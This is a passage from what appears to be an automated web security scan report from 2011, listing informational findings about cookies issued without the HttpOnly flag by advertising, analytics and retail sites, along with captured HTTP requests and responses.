Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; USATINFO=Handle%3D; usatprod=R1449728009

Response

16.181. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/usat/pluck/comments/comments.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

usatprod=R1449728009; path=/
SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.182. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/usat/pluck/pluck.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

usatprod=R1449728009; path=/
SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.183. http://sony.tcliveus.com/i previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sony.tcliveus.com
Path:	/i

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Tpo`=445b326b7863;expires=Mon, 16-May-11 01:20:48 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i?siteID=501&ts=1305494443778&location=http%3A%2F%2Fwww.sonystyle.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FCategoryDisplay%3FcatalogId%3D10551%26storeId%3D10151%26langId%3D-1%26categoryId%3D8198552921644780502%26%26pageName%3Dcontent%253AS_NB_SB_BP_Bundles%26g%3Dhttp%253A%2F%2Fwww.sonystyle.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FCategoryDisplay%253FcatalogId%253D10551%2526storeId%253D10151%2526langId%253D-1%2526categoryId%253D8198552921644780502%26r%3Dhttp%253A%2F%2Fwww.sonystyle.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FStoreCatalogDisplay%253FlangId%253D-1%2526storeId%253D10151%2526catalogId%253D10551%26ch%3DS_Computers%26h1%3DSony%2520Store%253A%253AS_Computers%253AS_Notebooks%253AS_NB_Series%253AS_NB_SB_BP_Bundles%26c3%3DCategoryDisplay%26v3%3D%253AS_Computers%253AS_Notebooks%253AS_NB_Series%253AS_NB_SB_BP_Bundles%26c5%3D%253AS_Computers%253AS_Notebooks%253AS_NB_Series%253AS_NB_SB_BP_Bundles%26c6%3Dcontent%253AS_NB_SB_BP_Bundles_%26c10%3Dcontent%253AS_Computers%26c12%3Dcontent%253A%253AS_Computers%253AS_Notebooks%253AS_NB_Series%253AS_NB_SB_BP_Bundles%26v23%3DUnited%2520States%2520English%26c27%3DS_NB_SB_BP_Bundles%2520-%2520Control%26v27%3DS_NB_SB_BP_Bundles%2520-%2520Control&tagv=5.3&tz=-300&r=http%3A%2F%2Fwww.sonystyle.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FStoreCatalogDisplay%3FlangId%3D-1%26storeId%3D10151%26catalogId%3D10551&title=S%20Series%20Battery%20Offer&cd=24&ah=1156&aw=1920&sh=1200&sw=1920&pd=24 HTTP/1.1
Host: sony.tcliveus.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=8198552921644780502
Cookie: TCID=0007afb9-cead-2156-9643-bc8d00000050; NSC_Tpo`=445b326b7863

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE"
Connection: Keep-Alive
Content-Length: 43
Last-Modified: Sun, 15 May 2011 21:20:48 GMT
Content-Type: image/gif
Date: Sun, 15 May 2011 21:20:48 GMT
Set-Cookie: NSC_Tpo`=445b326b7863;expires=Mon, 16-May-11 01:20:48 GMT;path=/

GIF89a.............!.......,............Q.;

16.184. http://sync.mathtag.com/sync/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ts=1305509185; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:26:25 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.185. http://t.invitemedia.com/track_imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t.invitemedia.com
Path:	/track_imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

impressions="{\"594387\": [1305509218+ \"c76fa991-e8e9-36fa-8db6-64674e41b1c5\"+ 3236+ 40464+ 620]}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 01:26:58 GMT; Path=/
camp_freq_p1="eJzjkuGYtZFVgEni0a+D71gUmDRuPbj4jsWAyeLWdyAfAKyYDO0="; Domain=invitemedia.com; expires=Tue, 15-May-2012 01:26:58 GMT; Path=/
io_freq_p1="eJzjEufoDhdgknj06+A7FgUGDQYDJotb34FsAGN2CPs="; Domain=invitemedia.com; expires=Tue, 15-May-2012 01:26:58 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.186. http://tag.admeld.com/ad/js/201/unitedstates/728x90/ros previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/js/201/unitedstates/728x90/ros

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

D41U=3YG_-W4iqwAOfqFlHKYRKsrclE62-bGkfESF3NqlKaMdGzjOFwP8Z7A; expires=Mon, 13-Jun-2011 01:19:58 GMT; path=/; domain=.tag.admeld.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/201/unitedstates/728x90/ros?01AD=3YG_-W4iqwAOfqFlHKYRKsrclE62-bGkfESF3NqlKaMdGzjOFwP8Z7A&01RI=B9C898CD44E1CB2&01NA=&url= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=d96a784e-8901-47de-9dd1-4f91acb31514; D41U=CT-1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 727
Content-Type: application/javascript
Date: Mon, 16 May 2011 01:19:58 GMT
Connection: close
Set-Cookie: D41U=3YG_-W4iqwAOfqFlHKYRKsrclE62-bGkfESF3NqlKaMdGzjOFwP8Z7A; expires=Mon, 13-Jun-2011 01:19:58 GMT; path=/; domain=.tag.admeld.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write("<div style='width:728px,height:90px;margin:0;border:0'>");

document.write(unescape('%3C%21--%20--------------%20Advertising.com%20------%20Admeld%20Adgent007%20-%20Admeld
...[SNIP]...

16.187. http://tag.contextweb.com/TagPublish/getad.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getad.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

V=8vciuQJMXXJY; domain=.contextweb.com; expires=Wed, 16-May-2012 01:20:42 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.188. http://tags.bluekai.com/site/2948 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2948

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bklc=4dd0804f; expires=Wed, 18-May-2011 01:39:27 GMT; path=/; domain=.bluekai.com
bk=e/5GeOcyjISd8JkA; expires=Sat, 12-Nov-2011 01:39:27 GMT; path=/; domain=.bluekai.com
bkc=KJhgTVjQIwsWAVamlxP4JQjtCCRQdpAfv+XwiJc81uy/FCQe961XAJ24YIvpQwAhuchmnQSsU51jsY8PUdOkO13OIY7B3cpcOkxIi/qh8UQjsYJDszaXJiMdMHGeYC2AcTyw9w2Hv7R=; expires=Sat, 12-Nov-2011 01:39:27 GMT; path=/; domain=.bluekai.com
bkst=KJhMR5Mwhze9pkYSk8tUU8TlLIbYnyFeOD0CaZTsOCDsA8xD9dmAj9F5PWFpJaNexT+AUKmDNsH5X0unjBBARy1pDt1edySxKMkKOQRKOGr081puxYd4i9iF0WFP/waP4sCs9y9C6uP4; expires=Sat, 12-Nov-2011 01:39:27 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.189. http://tags.bluekai.com/site/3358 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/3358

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bklc=4dd07d53; expires=Wed, 18-May-2011 01:26:43 GMT; path=/; domain=.bluekai.com
bk=uiT+m1V5c/sd8JkA; expires=Sat, 12-Nov-2011 01:26:43 GMT; path=/; domain=.bluekai.com
bkc=KJpM8sJQteV5QKau2xP4HQRsOATQwbDjkKdRQ1Gc6EYIcYXexTx3/8Mwp19s8g2HR6eChf9QI99z9hS2; expires=Sat, 12-Nov-2011 01:26:43 GMT; path=/; domain=.bluekai.com
bkst=KJhMRjeMjVeQRq9GuXTLe4E0MRMyiQ0rFK9n9eUdOk1=; expires=Sat, 12-Nov-2011 01:26:43 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.190. http://web.aisle7.net/jsapi/1.0/content.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://web.aisle7.net
Path:	/jsapi/1.0/content.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

aisle7c6=4090937773.1.3050751040.2686703417; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsapi/1.0/content.js HTTP/1.1
Host: web.aisle7.net
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:43:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Last-Modified: Wed, 11 May 2011 22:12:18 GMT
Content-Type: text/javascript
Content-Length: 71512
Set-Cookie: aisle7c6=4090937773.1.3050751040.2686703417; path=/

if (!window['$hnj'] || !$hnj.registry.included('/scripts/libraries/jquery/core.js')) {
(function(){var W=this,ab,F=W.jQuery,S=W.$,T=W.jQuery=W.$=function(b,a){return new T.fn.init(b,a)},M=/^[^<]*(
...[SNIP]...

16.191. http://webtrends.telegraph.co.uk/dcsshgbi400000gscd62rrg43_4o2o/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webtrends.telegraph.co.uk
Path:	/dcsshgbi400000gscd62rrg43_4o2o/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMzc0OTQ5MDA4LjMwMTUxNTI3AAAAAAABAAAAh8YAAKl70E2pe9BNAQAAAPFJAACpe9BNqXvQTQAAAAA-; path=/; expires=Thu, 13-May-2021 01:19:37 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsshgbi400000gscd62rrg43_4o2o/dcs.gif?&dcsdat=1305508776985&dcssip=www.telegraph.co.uk&dcsuri=/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html&WT.tz=-5&WT.bh=20&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Disney%20Cruise%20Line:%20A%20world%20of%20entertainment%20-%20Telegraph&WT.js=Yes&WT.jv=1.5&WT.bs=1136x902&WT.fi=Yes&WT.fv=10.3&WT.cg_s=travel&WT.cg_n=sponsored&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=173.193.214.243-1374949008.30151527.1305508776991&WT.co_f=173.193.214.243-1374949008.30151527&WT.pi=sponsored&MLC=/sponsored/travel/disney/article&Genre=disney&Category=travel&Channel=sponsored&Content_Type=Story&Level=4&articleFirstPublished=2011-05-13&articleId=8509938 HTTP/1.1
Host: webtrends.telegraph.co.uk
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-1374949008.30151527:lv=1305526776991:ss=1305526776991

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:19:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMzc0OTQ5MDA4LjMwMTUxNTI3AAAAAAABAAAAh8YAAKl70E2pe9BNAQAAAPFJAACpe9BNqXvQTQAAAAA-; path=/; expires=Thu, 13-May-2021 01:19:37 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

16.192. http://www.imiclk.com/cgi/r.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imiclk.com
Path:	/cgi/r.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CH=24785,53brJ,22244,53br0,28363,53br0,24783,53brJ,33114,00000,24782,53brJ,32619,00000,32620,00000; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:01:26 GMT
RQ=1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,3387,53br2,3388,53brH,3389,53brJ; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:01:26 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.193. http://www.mcafeesecure.com/ads/1002/25 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mcafeesecure.com
Path:	/ads/1002/25

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

adclick=1002-25; domain=.mcafeesecure.com; path=/; expires=Mon, 13-Jun-2011 01:39:27 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.194. https://www.mcafeesecure.com/RatingVerify previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mcafeesecure.com
Path:	/RatingVerify

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CAMEFROM=www.fingerhut.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RatingVerify?ref=www.fingerhut.com HTTP/1.1
Host: www.mcafeesecure.com
Connection: keep-alive
Referer: https://www.fingerhut.com/user/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405.1305377534.1.1.utmcsr=server.iad.liveperson.net|utmccn=(referral)|utmcmd=referral|utmcct=/hcp/integration/hackersafe/hackersafe-grey.html; adclick=1103-2; __utma=185732405.396205410.1305377534.1305377534.1305377534.1

Response

16.195. http://www.orbitz.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_JOsvdl03ebxvuujca335v2cbuzecbdh=ffffffff09e3d83d45525d5f4f58455e445a4a423660; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; __utmz=50245880.1305508790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50245880.1570544986.1305508790.1305508790.1305508790.1; __utmc=50245880; __utmb=50245880.1.10.1305508790; WT_FPC=id=173.193.214.243-1574869008.30151527:lv=1305505197446:ss=1305505197446

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 11 May 2011 17:00:39 GMT
ETag: "1536-4a30303185bc0"
Cache-Control: max-age=31536000
Expires: Sun, 13 May 2012 14:35:59 GMT
Content-Type: image/x-icon
Content-Length: 5430
Server: Apache
head: yes
Date: Mon, 16 May 2011 01:29:49 GMT
Age: 125630
Connection: keep-alive
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

............ .h...&... .... .........(....... ..... .....@.....................................................................................U...US..U..U..U..U..U..Uo..UC..U...................
...[SNIP]...

16.196. http://www.passporterboards.com/forums/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.passporterboards.com
Path:	/forums/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bblastvisit=1305508789; expires=Tue, 15-May-2012 01:31:56 GMT; path=/; domain=.passporterboards.com
vbseo_loggedin=deleted; expires=Sun, 16-May-2010 01:31:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.197. http://www.revresda.com/js.ng/channel=blog&Section=main&adsize=160x600&CookieName=OSC&secure=false&site=orbitz& previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/js.ng/channel=blog&Section=main&adsize=160x600&CookieName=OSC&secure=false&site=orbitz&

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

NGUserID=aeb2623-13012-567250685-15; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js.ng/channel=blog&Section=main&adsize=160x600&CookieName=OSC&secure=false&site=orbitz& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/blog/2011/05/cruise-vacations-5-tips-for-your-first-cruise-on-disney-dream/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:19:59 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeb2623-13012-567250685-15; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 874
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 874
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/

document.write('<a target=\"_top\" href=\"http://www.revresda.com/event.ng/Type=click&FlightID=79312&AdID=151195&TargetID=41261&ASeg=&AMod=&Segments=65,3724,4979,7409,8303,8773,11672,12591,23724,24028
...[SNIP]...

16.198. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderItemAddProxy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SYOrderItemAddProxy

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WC_PERSISTENT=CBnCTN%2fk0tv7Wl90iwNcp5k87TM%3d%0a%3b2011%2d05%2d15+17%3a21%3a12%2e486%5f1305494403722%2d66941%5f10151%5f239700473%2c%2d1%2cUSD%5f10151; Expires=Fri, 11 Nov 2011 21:21:13 GMT; Path=/
WC_ACTIVEPOINTER=%2d1%2c10151; Path=/
WC_USERACTIVITY_239700473=239700473%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fvzN%2fgvbF4ghNt8PgRSo%2b%2fNBSE9hpRmZaAnCWxRhvXnyiDgyG6f2JRy%2fQgFThm8VbLj%0apf57iOYY6h2A8sdaqv5FTXOiOIU42kXPZ%2fYZWH%2fwQEnvQPepS3%2fxt2yYHA%2f7TgndYr1UpWvZEg%3d%3d; Path=/
TS5bbf46=394e9935c8a4843c432fda4ab01398c678ed098d530cefc94dd0437160ac0ec518a9cd87529ede9fc63309c81389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70e5e49aff7d9564e1d; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/SYOrderItemAddProxy?catalogId=10551&storeId=10151&langId=-1&partNumber=VPCSB11FXWVGPBPSC24%2fBUNDLE&orderId=.&quantity=1&URL=OrderItemDisplay%3forderId%3d.&mode=add HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=8198552921644780502
Cookie: TS5bbf46=7383fa3612712fc2ae9b8567010662f778ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f2909ab541389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb233202c9c4e5eb222f7b4e774115284b9b8efe5667a7cd; mbox=check#true#1305494503|session#1305494389047-605069#1305496303|PC#1305494389047-605069.17#1306704043; s_cc=true; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_NB_SB_BP_Bundles%2526pidt%253D1%2526oid%253Dhttp%25253A//www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderItemAddProxy%25253FcatalogId%25253D10551%252526storeId%25253D10151%2526ot%253DA; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":2,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=%2bQPq5Txj0cSj2K9MPHgm6Rb8HNI%3d%0a%3b2011%2d05%2d15+17%3a20%3a03%2e73%5f1305494403722%2d66941%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPVRKIbqMMYxuD%0aoaA6bOthQ6slGtdA5zKliKbgbQb9Z5HHz%2fccln%2fsMfRWku9CoObHeEzUcYMu9buki6yfEb1E%2fw%3d%3d; WC_GENERIC_ACTIVITYDATA=[1077176697%3atrue%3afalse%3a0%3aS8M6cnqRHf96Dmh3XbrqfLKeUOs%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE

Response

16.199. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WC_PERSISTENT=54QQoWJDFmRqgIlusLgvkFz%2fsew%3d%0a%3b2011%2d05%2d15+17%3a20%3a23%2e441%5f1305494413090%2d67173%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; Expires=Fri, 11 Nov 2011 21:20:22 GMT; Path=/
WC_ACTIVEPOINTER=%2d1%2c10151; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPVRKIbqMMYxu%2b%0a7xVnM0NlbJ2KFYPKKr1yr8MFp%2bTcMb9El9scP1XMoof3Jfchxj0eLZvyoSmWFWzkmC4z%2fXC7Ng%3d%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[1077174990%3atrue%3afalse%3a0%3aDRrI3W%2bQPu72ZvFizfpio2QiM5I%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
TS5bbf46=216db8a284db92379e1916645696be2539c193bb00a4beab4dd0438d60ac0ec50d34d41a529ede9f6e5df6bd4b9b8efe3732da8c1389de873146ef5f3fc776346bd26e6edb2332020a9ec735222f7b4e01c7d4e1; Path=/

